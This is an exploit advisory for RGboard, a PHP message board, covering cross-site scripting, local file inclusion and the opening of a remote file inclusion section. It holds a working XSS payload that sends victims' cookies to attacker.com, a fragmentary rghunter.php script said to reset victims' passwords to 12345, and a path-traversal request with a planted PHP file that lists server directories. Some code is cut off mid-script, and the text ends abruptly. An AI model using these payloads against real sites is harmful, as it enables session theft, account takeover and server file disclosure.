/***************************
XSS Vulnerability
/wrtie.php
..
$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'.
*************************/
poc:
Inject XSS tag :
"http://attacker.com" Hi">onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi there! :)
/rghunter.php - Makes password as 12345
eregi_replace("http://","",$l);
$chk = 0;
for($i = 0; $i < strlen($url); $i++)
{
if($url[$i] == '/')
{
$chk = $i;
}
}
for($i = $chk; $i < strlen($url); $i++)
{
$url[$i] = "";
}
$url = $url."/../rg4_member/modify.php";
setcookie($c);
?>
/***************************
Local File Inclusion Vulnerability
/_footer.php
if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion
*************************/
poc:
//yeah, there is a problem.. file_exists()!
//How can we bypass it? I don`t know :)
//If we have account in same server with target, we can attack his board easily
//Here is the example :
http://attacker.com/RGboard/rg4_board/_footer.php?skin_path=../../../../../../tmp/
/tmp/footer.php
handle . "\n";
echo "Path: " . $d->path . "\n";
while (false !== ($entry = $d->read())) {
echo $entry."\n";
}
$d->close();
?>
//Yeah, It is good, But when we don`t account in that server, How we can beat target?
//We can find a clue from php.net
//On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares.
//As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers
//for a listing of which wrappers support stat() family of functionality.
//Do you find clue too? :-O
/***************************
Remote File Inclusion Vulnerability
/footer.php